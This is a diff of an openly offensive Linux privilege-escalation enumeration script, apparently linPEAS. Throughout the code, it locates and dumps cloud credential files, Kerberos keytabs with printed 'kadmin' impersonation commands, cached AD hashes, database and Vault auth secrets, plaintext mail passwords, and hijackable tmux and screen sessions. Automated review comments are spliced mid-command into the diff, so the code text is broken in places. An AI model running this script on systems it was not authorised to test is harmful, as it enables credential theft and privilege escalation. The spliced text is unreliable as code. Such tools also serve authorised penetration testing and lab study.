"s,User|ProxyCommand,${SED_RED},"; done + echo "" fi if [ "$hostsdenied" ]; then - echo " --> /etc/hosts.denied file found, read the rules:" + print_3title "/etc/hosts.denied file found, read the rules:" printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;32m&${C}[0m," + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," echo "" fi if [ "$hostsallow" ]; then - echo " --> /etc/hosts.allow file found, read the rules:" + print_3title "/etc/hosts.allow file found, trying to read the rules:" printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," echo "" fi if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${C}[1;31m&${C}[0m," + cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," fi echo "" #-- SI) PAM auth - printf $Y"[+] "$GREEN"Searching unexpected auth lines in /etc/pam.d/sshd\n"$NC + print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth` if [ "$pamssh" ]; then - cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" - #-- SI) Cloud keys - printf $Y"[+] "$GREEN"Searching Cloud credentials (AWS, Azure, GC)\n"$NC - cloudcreds=$(echo 
"$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|accessTokens\.json$|azureProfile\.json$') - if [ "$cloudcreds" ]; then - printf "%s\n" "$cloudcreds" | while read f; do - if [ -f "$f" ]; then #Check if file, here we only look for filenames, not dirs - printf "%s\n" "Trying to read $f" | sed -${E} "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g" - if [ -r "$f" ]; then - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" - fi - echo "" - fi - done - fi - echo "" - #-- SI) NFS exports - printf $Y"[+] "$GREEN"NFS exports?\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe\n"$NC - if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -${E} "s,insecure,${C}[1;31m&${C}[0m," + print_2title "NFS exports?" 
+ print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" + if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," else echo_not_found "/etc/exports" fi echo "" #-- SI) Kerberos - printf $Y"[+] "$GREEN"Searching kerberos conf files and tickets\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt\n"$NC + print_2title "Searching kerberos conf files and tickets" + print_info "https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt" kadmin_exists="`command -v kadmin`" klist_exists="`command -v klist`" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${C}[1;31m&${C}[0m,"; fi + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - - krb5=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'krb5\.conf|krb5.keytab|\.k5login') - printf "%s\n" "$krb5" | while read f; do + + printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then if [ "`echo \"$f\" | grep .k5login`" ]; then echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" elif [ "`echo \"$f\" | grep keytab`" ]; then echo "" echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + klist -k "$f" 2>/dev/null 
| sed -${E} "s,.*,${SED_RED},g" printf "`klist -k \"$f\" 2>/dev/null`\n" | awk '{print $2}' | while read l; do if [ "$l" ] && [ "`echo \"$l\" | grep \"@\"`" ]; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${C}[1;31m&${C}[0m,g" + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that fi done elif [ "`echo \"$f\" | grep krb5.conf`" ]; then ls -l "$f" - cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${C}[1;31m&${C}[0m,"; + cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${SED_RED},"; elif [ "`echo \"$f\" | grep kadm5.acl`" ]; then ls -l "$f" cat "$f" 2>/dev/null 
@@ -2323,83 +2282,50 @@ if [ "`echo $CHECKS | grep SofI`" ]; then klist 2>/dev/null || echo_not_found "klist" echo "" - #-- SI) kibana - printf $Y"[+] "$GREEN"Searching Kibana yaml\n"$NC - kibana=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'kibana\.y.*ml') - if [ "$kibana" ]; then - printf "$kibana\n" - printf "%s\n" "$kibana" | while read f; do - if [ -r "$f" ]; then - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -v -e '^[[:space:]]*$' | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${C}[1;31m&${C}[0m,"; - fi - done - else echo_not_found "kibana.yml" - fi - echo "" + print_2title "Analizing Knockd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analizing Kibana Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Elasticsearch Files (limit 70)" + echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" + if ! 
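Review bot: `"$$PSTORAGE_CERTSBIN"` in the certificates branch expands `$$` to the shell's PID followed by the literal text `PSTORAGE_CERTSBIN`, so the `[ ... ]` test is always true and `printf "$$PSTORAGE_CERTSBIN\n" | head -n 20` prints that junk instead of the certificate list. Both occurrences should read `"$PSTORAGE_CERTSBIN"`, i.e. `if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then` and `printf "$PSTORAGE_CERTSBIN\n" | head -n 20`. While there, `printf "$certsb4_grep\n"` passes discovered file names as the printf format string; `printf "%s\n" "$certsb4_grep"` is the safe form. The enclosing `if [ "`echo $CHECKS | grep SofI`" ]` block starts and ends outside this hunk.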
[ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; - #-- SI) Knock - printf $Y"[+] "$GREEN"Searching Knock configuration\n"$NC - Knock=$(echo "$FIND_ETC\n$FIND_MNT" | grep -E '/etc/init.d/.*knockd.*') - if [ "$Knock" ]; then - printf "%s\n" "$Knock" | while read f; do - h=$(grep -R -i "defaults_file=" $f | cut -b 15-) ##Search string to know where is the default knock file - example - DEFAULTS_FILE=/etc/default/knockd - i=$(grep -R -i "please edit" $h | awk '{print $4}') ##Search string to know where is config file - example - # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING - j=$(grep -R -i "sequence" $i) ##If we want we can show sequence number - 'hidded' - printf "Config Knock file found!: \n$i\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - printf " Sequence found!: \n$j\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - done - else echo_not_found "Knock.config" - fi - echo "" ##-- SI) Logstash - printf $Y"[+] "$GREEN"Searching logstash files\n"$NC - logstash=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'logstash') - if [ "$logstash" ]; then - printf "$logstash\n" - printf "%s\n" "$logstash" | while read d; do - if [ -r "$d/startup.options" ]; then + print_2title "Searching logstash files" + if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep 
"LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${C}[1;31m&${C}[0m," + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${SED_RED}," fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m," + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," done else echo_not_found fi echo "" - #-- SI) Elasticsearch - printf $Y"[+] "$GREEN"Searching elasticsearch files\n"$NC - elasticsearch=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'elasticsearch\.y.*ml') - if [ "$elasticsearch" ]; then - printf "$elasticsearch\n" - printf "%s\n" "$elasticsearch" | while read f; do - if [ -r "$f" ]; then - cat $f 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v -e '^[[:space:]]*$' | grep "path.data\|path.logs\|cluster.name\|node.name\|network.host\|discovery.zen.ping.unicast.hosts"; - fi - done - echo "Version: $(curl -X GET '10.10.10.115:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" - else echo_not_found - fi - echo "" - #-- SI) Vault-ssh - printf $Y"[+] "$GREEN"Searching Vault-ssh files\n"$NC - vaultssh=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'vault-ssh-helper\.hcl') - if [ "$vaultssh" ]; then - 
printf "$vaultssh\n" - printf "%s\n" "$vaultssh" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + print_2title "Searching Vault-ssh files" + if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" vault secrets list 2>/dev/null - echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.vault-token' | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null else echo_not_found "vault-ssh-helper.hcl" fi echo "" #-- SI) Cached AD Hashes adhashes=`ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null` - printf $Y"[+] "$GREEN"Searching AD cached hashes\n"$NC + print_2title "Searching AD cached hashes" if [ "$adhashes" ]; then ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null else echo_not_found "cached hashes" @@ -2407,11 +2333,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) Screen sessions - printf $Y"[+] "$GREEN"Searching screen sessions\n"$N - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC + print_2title "Searching screen sessions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" screensess=`screen -ls 2>/dev/null` if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," else echo_not_found "screen" fi echo "" 
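Review bot: The new Elasticsearch header runs `curl` against `127.0.0.1:9200` unconditionally and echoes "The version is" even when nothing answers, whereas the removed code only probed after a config file was found (and against a hard-coded lab address, which this change rightly drops). Capture the result first and print it only when non-empty: `es_version=$(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)` followed by `if [ "$es_version" ]; then echo "The version is $es_version"; fi`. In the logstash block the new `cat "$d/conf.d/out*"` and `cat "$d/conf.d/filt*"` lines keep the glob inside double quotes, so it is passed literally and never matches; `cat "$d"/conf.d/out* 2>/dev/null` lets it expand and silences the not-found noise. The enclosing `if` block starts and ends outside this hunk.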
@@ -2419,187 +2345,119 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Tmux sessions tmuxdefsess=`tmux ls 2>/dev/null` tmuxnondefsess=`ps auxwww | grep "tmux " | grep -v grep` - printf $Y"[+] "$GREEN"Searching tmux sessions\n"$N - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC + print_2title "Searching tmux sessions"$N + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," else echo_not_found "tmux" fi echo "" - #-- SI) Couchdb - printf $Y"[+] "$GREEN"Searching Couchdb directory\n"$NC - couchdb_dirs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'couchdb') - printf "%s\n" "$couchdb_dirs" | while read d; do - for f in `find $d -name local.ini 2>/dev/null`; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^;" | grep -v "^$" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - done - echo "" + print_2title "Analizing CouchDB Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_COUCHDB\" | grep -E \"couchdb$\"`" ]; then echo_not_found "couchdb"; fi; printf "%s" "$PSTORAGE_COUCHDB" | grep -E "couchdb$" | while read f; do ls -ld "$f" | sed -${E} "s,couchdb$,${SED_RED},"; for ff in $(find "$f" -name "local.ini"); do ls -ld "$ff" | sed -${E} "s,local.ini,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Redis Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_REDIS\" | grep -E \"redis\.conf$\"`" ]; then echo_not_found "redis.conf"; fi; printf "%s" "$PSTORAGE_REDIS" | grep -E "redis\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,redis\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,masterauth.*|requirepass.*,${SED_RED},g"; done; echo ""; - #-- SI) Redis - printf $Y"[+] "$GREEN"Searching redis.conf\n"$NC - redisconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'redis\.conf$') - printf "%s\n" "$redisconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,masterauth.*|requirepass.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - echo "" #-- SI) Dovecot # Needs testing - printf $Y"[+] "$GREEN"Searching dovecot files\n"$NC + print_2title "Searching dovecot files" dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) - if [ -z "$dovecotpass" ]; then + if [ -z "$dovecotpass" ]; then echo_not_found "dovecot credentials" else for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null done fi echo "" - 
#-- SI) Mosquitto - printf $Y"[+] "$GREEN"Searching mosquitto.conf\n"$NC - mqttconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mosquitto\.conf$') - printf "%s\n" "$mqttconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - echo "" + print_2title "Analizing Mosquitto Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then echo_not_found "mosquitto.conf"; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; - #-- SI) Neo4j - printf $Y"[+] "$GREEN"Searching neo4j auth file\n"$NC - neo4j=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'neo4j') - printf "%s\n" "$neo4j" | while read d; do - if [ -r "$d" ]; then - echo "Found readable $d" - find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null - fi - done - echo "" - #-- SI) Cloud-Init - printf $Y"[+] "$GREEN"Searching Cloud-Init conf file\n"$NC - cloudcfg=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cloud\.cfg$') - printf "%s\n" "$cloudcfg" | while read f; do - if [ -r "$f" ]; then - echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE 
KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${C}[1;31m&${C}[0m," - fi - done - echo "" + print_2title "Analizing Neo4j Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then echo_not_found "neo4j"; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" | sed -${E} "s,neo4j$,${SED_RED},"; for ff in $(find "$f" -name "auth"); do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - ##-- SI) Erlang - printf $Y"[+] "$GREEN"Searching Erlang cookie file\n"$NC - erlangcoo=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '.erlang.cookie$') - printf "%s\n" "$erlangcoo" | while read f; do - if [ -r "$f" ]; then - echo "Found Erlang cookie: $f" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - fi - done - echo "" - ##-- SI) GVM - printf $Y"[+] "$GREEN"Searching GVM auth file\n"$NC - gvmconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'gvm-tools\.conf') - printf "%s\n" "$gvmconfs" | while read f; do - if [ -r "$f" ]; then - echo "Found GVM auth file: $f" - cat "$f" 2>/dev/null | sed -${E} "s,username.*|password.*,${C}[1;31m&${C}[0m," - fi - done - echo "" + print_2title "Analizing Cloud credentials Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials$\"`" ]; then echo_not_found "credentials"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"credentials\.db$\"`" ]; then echo_not_found "credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"legacy_credentials\.db$\"`" ]; then echo_not_found "legacy_credentials.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "legacy_credentials\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,legacy_credentials\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.db$\"`" ]; then echo_not_found "access_tokens.db"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"access_tokens\.json$\"`" ]; then echo_not_found "access_tokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "access_tokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,access_tokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"accessTokens\.json$\"`" ]; then echo_not_found "accessTokens.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "accessTokens\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,accessTokens\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"azureProfile\.json$\"`" ]; then echo_not_found "azureProfile.json"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then echo_not_found "TokenCache.dat"; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then 